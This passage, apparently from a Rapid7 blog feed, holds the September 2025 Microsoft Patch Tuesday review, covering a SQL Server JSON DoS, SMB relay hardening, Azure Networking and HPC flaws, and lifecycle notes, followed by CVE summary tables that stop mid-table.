undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59284"><span style='font-size: undefined;'>CVE-2025-59284</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows NTLM Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59294"><span style='font-size: undefined;'>CVE-2025-59294</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Taskbar Live Preview Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>2.1</span></p></td></tr></tbody></table><p></p><p></p><h2>Update history</h2><ul><li><strong>2025-10-20</strong>: added Summary Tables.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025</link>
      <guid isPermaLink="false">blt69dd6905757f06ea</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 14 Oct 2025 21:29:13 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - September 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 176 vulnerabilities today, which seems like a lot, and it is. Curiously, Microsoft’s own Security Update Guide (SUG) for </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep" target="_self"><span style='font-size: undefined;'>September 2025 Patch Tuesday</span></a><span style='font-size: undefined;'> only lists 86 vulns, and that’s because the SUG doesn’t include a large number of open source software (OSS) fixes published today as part of updates for Azure Linux/CBL-Mariner. Microsoft is aware of public disclosure for just two of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Yet again, there are zero-day vulnerabilities patched, but none of them evaluate as critical severity. Today’s release includes the publication of five critical remote code execution (RCE) vulnerabilities, although Microsoft expects that none of these are particularly likely to see exploitation. Five browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SQL Server: zero-day DoS</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>What happens if you ask SQL Server to deserialize a JSON object with thousands of levels of nested objects? If you guessed denial of service, then you are good at guessing, because that’s what </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> describes. As zero-day vulnerabilities go, it doesn’t seem particularly terrifying, since presumably the worst an attacker can do is knock down a service, which can then be picked up again. Of course, that’s all relative, since some SQL Server instances are doing very important work: think hospitals, airports, and other critical infrastructure. Taking a step back: if an unauthenticated attacker can send arbitrary queries directly into your SQL Server instances, then that’s already a broader security architecture issue.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Perhaps the most interesting thing about </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> is its long and convoluted history. The underlying defect is not in SQL Server, but in </span><a href="https://github.com/JamesNK/Newtonsoft.Json"><span style='font-size: undefined;'>Newtonsoft.Json</span></a><span style='font-size: undefined;'>, which is the de facto standard for handling JSON in .NET applications, including SQL Server and many other products. Versions of Newtonsoft.Json prior to 13.0.1 are vulnerable, and this isn’t new information; </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> was originally </span><a href="https://www.vulncheck.com/advisories/vc-advisory-ghsa-5crp-9r3c-p9vr"><span style='font-size: undefined;'>made public</span></a><span style='font-size: undefined;'> on 2024-01-03 with some help from VulnCheck, so Microsoft is playing catch-up here. The underlying defect has been public knowledge for way longer than that, however, since Aleph Security first flagged it up </span><a href="https://alephsecurity.com/vulns/aleph-2018004"><span style='font-size: undefined;'>way back in 2018</span></a><span style='font-size: undefined;'> without attaching a CVE number. It remains unclear why Microsoft chose to address this now, but better late than never.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SMB server: zero-day(?) EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>How’s your SMB server configuration? Is it fully hardened, with </span><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing"><span style='font-size: undefined;'>SMB server signing</span></a><span style='font-size: undefined;'> and </span><a href="https://learn.microsoft.com/en-us/security-updates/securityadvisories/2009/973811"><span style='font-size: undefined;'>Extended Protection for Authentication</span></a><span style='font-size: undefined;'> enabled? If not, then </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234"><span style='font-size: undefined;'>CVE-2025-55234</span></a><span style='font-size: undefined;'> set out clearly why you should be worrying about SMB Server relay attacks, where an attacker pretends to be a legitimate server using ARP spoofing, DNS poisoning, or some other suitable trickery. Any pen testers or threat actors reading this will no doubt be thinking of the popular OSS tool Responder, which streamlines exactly this sort of attack. Options for attackers include credential relaying (which is mitigated by </span><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing"><span style='font-size: undefined;'>SMB signing</span></a><span style='font-size: undefined;'>), as well as offline cracking of the hash to reveal the password.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The key takeaway from the </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234"><span style='font-size: undefined;'>CVE-2025-55234</span></a><span style='font-size: undefined;'> advisory, other than the explanation of the well-known attack surface around SMB authentication, is that this is one of those times where simply patching isn’t enough; in fact, the patches provide administrators with more auditing options to determine whether their SMB Server is interacting with clients that won’t support the recommended hardening options. Other Microsoft server products (e.g. </span><a href="https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-extended-protection"><span style='font-size: undefined;'>Exchange</span></a><span style='font-size: undefined;'>) offer a similar tough choice: lock out less capable clients, or leave your server in a state which permits relay attacks. None of the attack techniques covered are new, so this isn’t really a zero-day vulnerability, except inasmuch as it was published today, and describes an attack which is already publicly disclosed.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Azure Networking: critical EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>It’s not every day that we see a perfect(?) 10.0 CVSS v3 base score, but </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54914"><span style='font-size: undefined;'>CVE-2025-54914</span></a><span style='font-size: undefined;'> is one such rare beast, thanks to the seldom-seen scope change described by the CVSS v3 vector. However, that’s all we get; the aggressively minimalist advisory fails to explain the nature of the vulnerability in any way at all. Mercifully, the advisory does pour a little oil on its own troubled waters by clarifying that this is a cloud service vulnerability, Microsoft has already fixed it, and there is no action to be taken by users of the service. Other reasons to consider not panicking: the Acknowledgements section lists only Microsoft researchers, so we can hope that no one else knows enough to do any damage. For anyone wondering which cloud service was impacted, the answer is Azure Networking, which is probably only important if your cloud assets ever need to communicate with anything at all.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Azure HPC: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Azure High Performance Computer (HPC) admins should pay close attention to </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55232"><span style='font-size: undefined;'>CVE-2025-55232</span></a><span style='font-size: undefined;'>, a critical unauthenticated RCE exploitable over the network. The advisory sets out the pre-requisites for the actual patch, and also hints that appropriate firewall rules should be in place, especially for TCP port 5999. The advisory doesn’t describe exactly what those firewall rules should look like or what they’re protecting, but port 5999 is the default port for the HpcScheduler, which orchestrates HPC jobs, resource management, and cluster communication.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant changes to Microsoft product lifecycles this month. A few Azure services move into retirement towards the end of September: Azure Basic Load Balancer, Azure Database for MariaDB, Azure HPC Cache, Azure Remote Rendering, Azure Service Map, Azure SQL Edge, Azure Unmanaged Disks, and Azure vFXT. As Rapid7 noted previously, there will be a number of significant changes in October, including the categorical </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>.</span></p><h2>Summary charts</h2><figure style="margin: 0; text-align: center"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14558dece0027369/68c093a738cccc278aeaef8f/2025-09-vuln_count_component.png" height="520" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" caption="It is an ancient Mariner, and he patcheth one of three" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" width="1071" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14558dece0027369/68c093a738cccc278aeaef8f/2025-09-vuln_count_component.png" data-sys-asset-uid="blt14558dece0027369" data-sys-asset-filename="2025-09-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="It is an ancient Mariner, and he patcheth one of three" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/><figcaption style="text-align:center">It is an ancient Mariner, and he patcheth one of three</figcaption></div></figure><h1>⠀</h1><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltde989965b5982236/68c093a7e2fb9a346a917fb4/2025-09-vuln_count_impact.png" height="453" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" width="839" max-width="839" max-height="453" style="text-align: center; max-width: 839px; width: 839px; max-height: 453px; height: 453px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltde989965b5982236/68c093a7e2fb9a346a917fb4/2025-09-vuln_count_impact.png" data-sys-asset-uid="bltde989965b5982236" data-sys-asset-filename="2025-09-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/></figure><h1>⠀</h1><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd1d3daa983de0a38/68c093a711efa9faf25ca2ea/2025-09-vuln_count_impact-component-heatmap.png" height="1300" alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" width="861" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd1d3daa983de0a38/68c093a711efa9faf25ca2ea/2025-09-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltd1d3daa983de0a38" data-sys-asset-filename="2025-09-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/></figure><h2>Update history</h2><ul><li>2025-09-10: corrected link to Microsoft Security Update Guide and a small typo in a product name.</li></ul><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55245">CVE-2025-55245</a></td><td><p>Xbox Gaming Services Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55242">CVE-2025-55242</a></td><td><p>Xbox Certification Bug Copilot Djando Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54914">CVE-2025-54914</a></td><td><p>Azure Networking Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>10</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55232">CVE-2025-55232</a></td><td><p>Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55241">CVE-2025-55241</a></td><td><p>Azure Entra Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55244">CVE-2025-55244</a></td><td><p>Azure Bot Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49692">CVE-2025-49692</a></td><td><p>Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55316">CVE-2025-55316</a></td><td><p>Azure Arc Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53791">CVE-2025-53791</a></td><td><p>Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9867">CVE-2025-9867</a></td><td><p>Chromium: CVE-2025-9867 Inappropriate implementation in Downloads</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9866">CVE-2025-9866</a></td><td><p>Chromium: CVE-2025-9866 Inappropriate implementation in Extensions</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9865">CVE-2025-9865</a></td><td><p>Chromium: CVE-2025-9865 Inappropriate implementation in Toolbar</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9864">CVE-2025-9864</a></td><td><p>Chromium: CVE-2025-9864 Use after free in V8</p></td><td><p>No</p></td><td><p>No</p></td><td><p>N/A</p></td></tr></tbody></table><h3>ESU Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55234">CVE-2025-55234</a></td><td><p>Windows SMB Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>Yes</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54106">CVE-2025-54106</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54113">CVE-2025-54113</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918">CVE-2025-54918</a></td><td><p>Windows NTLM Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110">CVE-2025-54110</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54916">CVE-2025-54916</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54091">CVE-2025-54091</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54098">CVE-2025-54098</a></td><td><p>Windows Hyper-V Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54912">CVE-2025-54912</a></td><td><p>Windows BitLocker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54895">CVE-2025-54895</a></td><td><p>SPNEGO Extended Negotiation (NEGOEX) Security Mechanism Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54894">CVE-2025-54894</a></td><td><p>Local Security Authority Subsystem Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54911">CVE-2025-54911</a></td><td><p>Windows BitLocker Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54093">CVE-2025-54093</a></td><td><p>Windows TCP/IP Driver Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54099">CVE-2025-54099</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53808">CVE-2025-53808</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53810">CVE-2025-53810</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54094">CVE-2025-54094</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54104">CVE-2025-54104</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54109">CVE-2025-54109</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54915">CVE-2025-54915</a></td><td><p>Windows Defender Firewall Service Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55226">CVE-2025-55226</a></td><td><p>Graphics Kernel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53797">CVE-2025-53797</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53798">CVE-2025-53798</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54095">CVE-2025-54095</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54096">CVE-2025-54096</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54097">CVE-2025-54097</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55225">CVE-2025-55225</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53796">CVE-2025-53796</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53806">CVE-2025-53806</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53804">CVE-2025-53804</a></td><td><p>Windows Kernel-Mode Driver Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53803">CVE-2025-53803</a></td><td><p>Windows Kernel Memory Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54101">CVE-2025-54101</a></td><td><p>Windows SMB Client Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54107">CVE-2025-54107</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54917">CVE-2025-54917</a></td><td><p>MapUrlToZone Security Feature Bypass Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>4.3</p></td></tr></tbody></table><h3>ESU Windows Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53799">CVE-2025-53799</a></td><td><p>Windows Imaging Component Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>5.5</p></td></tr></tbody></table><h3>Mariner vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-57052">CVE-2025-57052</a></td><td><p>cJSON 1.5.0 through 1.7.18 allows out-of-bounds access via the decode_array_index_from_pointer function in cJSON_Utils.c, allowing remote attackers to bypass array bounds checking and access restricted data via malformed JSON pointer strings containing alphanumeric characters.</p></td><td><p>No</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-9566">CVE-2025-9566</a></td><td><p>Podman: podman kube play command may overwrite host files</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.1</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55238">CVE-2025-55238</a></td><td><p>Dynamics 365 FastTrack Implementation Assets Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.5</p></td></tr></tbody></table><h3>Microsoft Office vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54897">CVE-2025-54897</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54910">CVE-2025-54910</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54908">CVE-2025-54908</a></td><td><p>Microsoft PowerPoint Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54907">CVE-2025-54907</a></td><td><p>Microsoft Office Visio Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54906">CVE-2025-54906</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54896">CVE-2025-54896</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54898">CVE-2025-54898</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54899">CVE-2025-54899</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54902">CVE-2025-54902</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54903">CVE-2025-54903</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54904">CVE-2025-54904</a></td><td><p>Microsoft Excel Remote Code Execution 